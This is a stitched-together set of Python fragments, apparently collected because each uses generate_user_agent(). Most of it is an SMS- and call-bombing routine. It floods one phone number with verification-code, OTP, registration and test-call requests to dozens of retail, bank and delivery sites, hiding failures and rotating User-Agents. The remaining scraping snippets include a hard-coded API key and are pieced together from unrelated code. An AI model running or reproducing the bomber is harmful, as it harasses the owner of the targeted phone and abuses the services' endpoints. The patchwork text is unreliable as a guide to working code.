"customers/sendVerificationCode", "phone": phone9, "g-recaptcha-response": "" }, headers=headers) except: pass try: post("https://www.flipkart.com/api/5/user/otp/generate", headers={ "Origin": "https://www.flipkart.com", "User-Agent": generate_user_agent() }, data={"loginId": "+" + phone}) except: pass try: post("https://www.flipkart.com/api/6/user/signup/status", headers={ "Origin": "https://www.flipkart.com", "User-Agent": generate_user_agent() }, json={ "loginId": "+" + phone, "supportAllStates": True }) except: pass try: post("https://fix-price.ru/ajax/register_phone_code.php", data={ "register_call": "Y", "action": "getCode", "phone": "+" + phone }, headers=headers) except: pass try: get("https://findclone.ru/register", params={"phone": "+" + phone}, headers=headers) except: pass try: post("https://www.finam.ru/api/smslocker/sendcode", data={"phone": "+" + phone}, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+# (###) ###-##-##") post("https://2407.smartomato.ru/account/session", json={ "phone": formatted_phone, "g-recaptcha-response": None }, headers=headers) except: pass try: post("https://www.etm.ru/cat/runprog.html", data={ "m_phone": phone9, "mode": "sendSms", "syf_prog": "clients-services", "getSysParam": "yes" }, headers=headers) except: pass try: get("https://api.eldorado.ua/v1/sign/", params={ "login": phone, "step": "phone-check", "fb_id": "null", "fb_token": "null", "lang": "ru" }, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+## (###) ###-##-##") post("https://e-groshi.com/online/reg", data={ "first_name": name, "last_name": name, "third_name": name, "phone": formatted_phone, "password": password, "password2": password }, headers=headers) except: pass try: post("https://vladimir.edostav.ru/site/CheckAuthLogin", data={"phone_or_email": "+" + phone}, headers=headers) except: pass try: post("https://api.easypay.ua/api/auth/register", json={ "phone": phone, "password": password }, headers=headers) except: pass try: post("https://my.dianet.com.ua/send_sms/", data={"phone": phone}, headers=headers) except: pass try: post("https://api.delitime.ru/api/v2/signup", data={ "SignupForm[username]": phone, "SignupForm[device_type]": 3 }, headers=headers) except: pass try: formatted_phone = 
format_phone(phone, "+# (###) ###-##-##") post("https://api.creditter.ru/confirm/sms/send", json={ "phone": formatted_phone, "type": "register" }, headers=headers) except: pass try: post("https://clients.cleversite.ru/callback/run.php", data={ "siteid": "62731", "num": phone, "title": "Онлайн-консультант", "referrer": "https://m.cleversite.ru/call" }, headers=headers) except: pass try: post("https://city24.ua/personalaccount/account/registration", data={"PhoneNumber": phone}, headers=headers) except: pass try: post( f"https://www.citilink.ru/registration/confirm/phone/+{phone}/", headers=headers) except: pass try: formatted_phone = format_phone(phone, "+# (###) ###-##-##") post("https://cinema5.ru/api/phone_code", data={"phone": formatted_phone}, headers=headers) except: pass try: post("https://api.cian.ru/sms/v1/send-validation-code/", json={ "phone": "+" + phone, "type": "authenticateCode" }, headers=headers) except: pass try: post( "https://api.carsmile.com/", son={ "operationName": "enterPhone", "variables": { "phone": phone }, "query": "mutation enterPhone($phone: String!) {\n enterPhone(phone: $phone)\n}\n" }, headers=headers) except: pass try: get("https://it.buzzolls.ru:9995/api/v2/auth/register", params={"phoneNumber": "+" + phone}, headers={ "keywordapi": "ProjectVApiKeyword", "usedapiversion": "3", "User-Agent": generate_user_agent() }) except: pass try: formatted_phone = format_phone(phone9, "(###)###-##-##") post("https://bluefin.moscow/auth/register/", data={ "phone": formatted_phone, "sendphone": "Далее" }, headers=headers) except: pass try: post("https://app.benzuber.ru/login", data={"phone": "+" + phone}, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+# (###) ###-##-##") post("https://bartokyo.ru/ajax/login.php", data={"user_phone": formatted_phone}, headers=headers) except: pass try: post("https://bamper.by/registration/?step=1", data={ "phone": "+" + phone, "submit": "Запросить смс подтверждения", "rules": "on" }, headers=headers) except: pass try: formatted_phone = format_phone(phone9, "(###) ###-##-##") get("https://avtobzvon.ru/request/makeTestCall", params={"to": formatted_phone}, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+# (###) ###-##-##") post("https://oauth.av.ru/check-phone", json={"phone": formatted_phone}, headers=headers) except: pass try: post( "https://api-prime.anytime.global/api/v2/auth/sendVerificationCode", data={"phone": phone}, headers=headers) except: pass try: formatted_phone = format_phone(phone, "+# (###) ###-##-##") post("https://apteka.ru/_action/auth/getForm/", data={ "form[NAME]": "", "form[PERSONAL_GENDER]": "", "form[PERSONAL_BIRTHDAY]": "", "form[EMAIL]": "", "form[LOGIN]": formatted_phone, "form[PASSWORD]": password, "get-new-password": "******", "user_agreement": "on", "personal_data_agreement": "on", "formType": "simple", "utc_offset": "120" }, headers=headers) except: pass
def __init__(self):
    super(HttpHandler, self).__init__()
    self.session = Session()
    self.headers = {'User-Agent': generate_user_agent()}
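A hypothetical call site for the handler above, reusing the stored session and headers (the method name and URL argument are assumptions, not from the original class):

def fetch(self, url):
    # issue the request through the shared session with the generated User-Agent
    return self.session.get(url, headers=self.headers)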
def _getContentFromSite(self, link):
    # pass the generated User-Agent with the request itself; assigning to
    # r.headers after the call would not affect the outgoing request
    r = requests.get(link, headers={"User-Agent": generate_user_agent()})
    content = str(r.content, self.encoding, errors="replace")
    soup = BeautifulSoup(content, 'html.parser')
    return soup
for url in urllist:
    try:
        # searchinput = browser.find_element_by_css_selector('#kw')
        # searchinput.send_keys(msgstring)
        # searchinput.send_keys(Keys.DOWN)
        # browser setup
        # cityname = ''
        # ip_proxy = changeip(cityname)
        service_args = []
        dcap = {}
        # generate a random User-Agent string to disguise the browser
        uainfo = generate_user_agent()
        print(type(uainfo))
        print(uainfo)
        # dcap["phantomjs.page.settings.userAgent"] = (
        #     uainfo
        # )
        # dcap["phantomjs.page.settings.loadImages"] = False
        # # IP proxy
        # proxy = webdriver.Proxy()
        # proxy.proxy_type = ProxyType.MANUAL
        # proxy.http_proxy = ip_proxy
        # proxy.add_to_capabilities(dcap)
        # browser = webdriver.PhantomJS(desired_capabilities=dcap, service_args=service_args)
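A hedged sketch of what the commented-out PhantomJS setup above would look like when enabled, assuming an older Selenium release where webdriver.PhantomJS is still available:

from selenium import webdriver
from user_agent import generate_user_agent

dcap = dict(webdriver.DesiredCapabilities.PHANTOMJS)
# disguise the headless browser with a generated User-Agent
dcap["phantomjs.page.settings.userAgent"] = generate_user_agent()
dcap["phantomjs.page.settings.loadImages"] = False
browser = webdriver.PhantomJS(desired_capabilities=dcap, service_args=[])
browser.get(url)  # url comes from the surrounding loop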
def default_header(self):
    return {
        'Referer': 'https://www.chinawealth.com.cn/zzlc/jsp/lccp.jsp',
        'User-Agent': generate_user_agent(os=('mac',)),
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
    }
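A hypothetical call site for default_header(); the url and payload names are placeholders and not taken from the original code:

# placeholders: url and payload would be defined by the caller
resp = requests.post(url, data=payload, headers=self.default_header())
resp.raise_for_status()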
'ClientId': '55decdcf6d4cd1bcaa1b3856', 'Accept': 'application/json', 'device': 'android', 'Android-Api-Version': '22', 'X-API-KEY': '93fbd7a8-47d8-4c0d-a822-8615816c9536', 'User-Agent': 'Android client (4.4 / api22),ru.kinopoisk/4.2.1 (52)' } config['kinopoisk']['main'][ 'search'] = 'https://kinopoiskapiunofficial.tech/api/v2.1/films/search-by-keyword?keyword=%s&page=%s' config['kinopoisk']['main']['headers'] = lambda: { 'Referer': 'https://www.kinopoisk.ru', 'Accept': 'text/html, application/xhtml+xml, image/jxr, */*', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.8,ru;q=0.7,uk;q=0.5,de-DE;q=0.3,de;q=0.2', 'User-agent': generate_user_agent(), 'X-Compress': 'null', 'X-API-KEY': '93fbd7a8-47d8-4c0d-a822-8615816c9536', 'Upgrade-Insecure-Requests': '1' } config['kinopoisk']['main'][ 'yasearch'] = 'https://suggest-kinopoisk.yandex.net/suggest-kinopoisk?srv=kinopoisk&part=%s&nocookiesupport=yes' config['kinopoisk']['images'] = '%s' config['kinopoisk']['imagesactor'] = 'https://st.kp.yandex.net/images/%s' config['kinopoisk'][ 'actor'] = config.kinopoisk.imagesactor % 'actor_iphone/iphone360_%s.jpg' config['kinopoisk'][ 'thumb'] = 'https://kinopoiskapiunofficial.tech/images/posters/kp_small/%s.jpg' config['kinopoisk'][
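The headers entry above is a lambda so each request can get freshly generated headers; a hypothetical call site using the search template (the keyword and page values are placeholders):

resp = requests.get(
    config['kinopoisk']['main']['search'] % ('matrix', 1),
    headers=config['kinopoisk']['main']['headers'](),   # call the lambda for fresh headers
)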
def get_useragent():
    headers = dict()
    user_agent = generate_user_agent(os=('mac', 'linux'))
    headers['User-Agent'] = user_agent
    return headers
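Example use of get_useragent() with requests (the target URL is a placeholder, not from the original):

import requests

resp = requests.get('https://example.com', headers=get_useragent())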
def process_config(self, grab): req = Request(data=None) try: request_url = normalize_url(grab.config['url']) except Exception as ex: raise error.GrabInvalidUrl( u'%s: %s' % (six.text_type(ex), grab.config['url'])) req.url = request_url method = grab.detect_request_method() req.method = make_str(method) req.body_maxsize = grab.config['body_maxsize'] if grab.config['nobody']: req.body_maxsize = 0 req.timeout = grab.config['timeout'] req.connect_timeout = grab.config['connect_timeout'] extra_headers = {} # Body processing if grab.config['body_inmemory']: pass else: if not grab.config['body_storage_dir']: raise GrabMisuseError( 'Option body_storage_dir is not defined') file_, path_ = self.setup_body_file( grab.config['body_storage_dir'], grab.config['body_storage_filename'], create_dir=grab.config['body_storage_create_dir']) req._response_file = file_ req._response_path = path_ if grab.config['multipart_post'] is not None: post_data = grab.config['multipart_post'] if isinstance(post_data, six.binary_type): pass elif isinstance(post_data, six.text_type): raise GrabMisuseError('Option multipart_post data' ' does not accept unicode.') else: post_items = normalize_http_values( grab.config['multipart_post'], charset=grab.config['charset'], ignore_classes=(UploadFile, UploadContent), ) #if six.PY3: post_items = decode_pairs(post_items, grab.config['charset']) post_items = process_upload_items(post_items) post_data, content_type = encode_multipart_formdata(post_items) extra_headers['Content-Type'] = content_type extra_headers['Content-Length'] = len(post_data) req.data = post_data elif grab.config['post'] is not None: post_data = normalize_post_data(grab.config['post'], grab.config['charset']) # py3 hack # if six.PY3: # post_data = smart_unicode(post_data, # grab.config['charset']) extra_headers['Content-Length'] = len(post_data) req.data = post_data if method in ('POST', 'PUT'): if (grab.config['post'] is None and grab.config['multipart_post'] is None): raise GrabMisuseError('Neither `post` or `multipart_post`' ' options was specified for the %s' ' request' % method) # Proxy if grab.config['proxy']: req.proxy = grab.config['proxy'] if grab.config['proxy_userpwd']: req.proxy_userpwd = grab.config['proxy_userpwd'] if grab.config['proxy_type']: req.proxy_type = grab.config['proxy_type'] else: req.proxy_type = 'http' # User-Agent if grab.config['user_agent'] is None: if grab.config['user_agent_file'] is not None: with open(grab.config['user_agent_file']) as inf: lines = inf.read().splitlines() grab.config['user_agent'] = random.choice(lines) else: grab.config['user_agent'] = generate_user_agent() extra_headers['User-Agent'] = grab.config['user_agent'] # Headers headers = extra_headers headers.update(grab.config['common_headers']) if grab.config['headers']: headers.update(grab.config['headers']) req.headers = headers # Cookies self.process_cookie_options(grab, req) self._request = req
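The User-Agent precedence implemented near the end of process_config above, isolated here as a standalone sketch for illustration (the helper name is an assumption; Grab itself does this inline):

import random
from user_agent import generate_user_agent

def resolve_user_agent(user_agent=None, user_agent_file=None):
    if user_agent is not None:
        return user_agent                                   # explicit value wins
    if user_agent_file is not None:
        with open(user_agent_file) as inf:
            return random.choice(inf.read().splitlines())   # random line from the file
    return generate_user_agent()                            # otherwise generate one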
def run(): ua = generate_user_agent()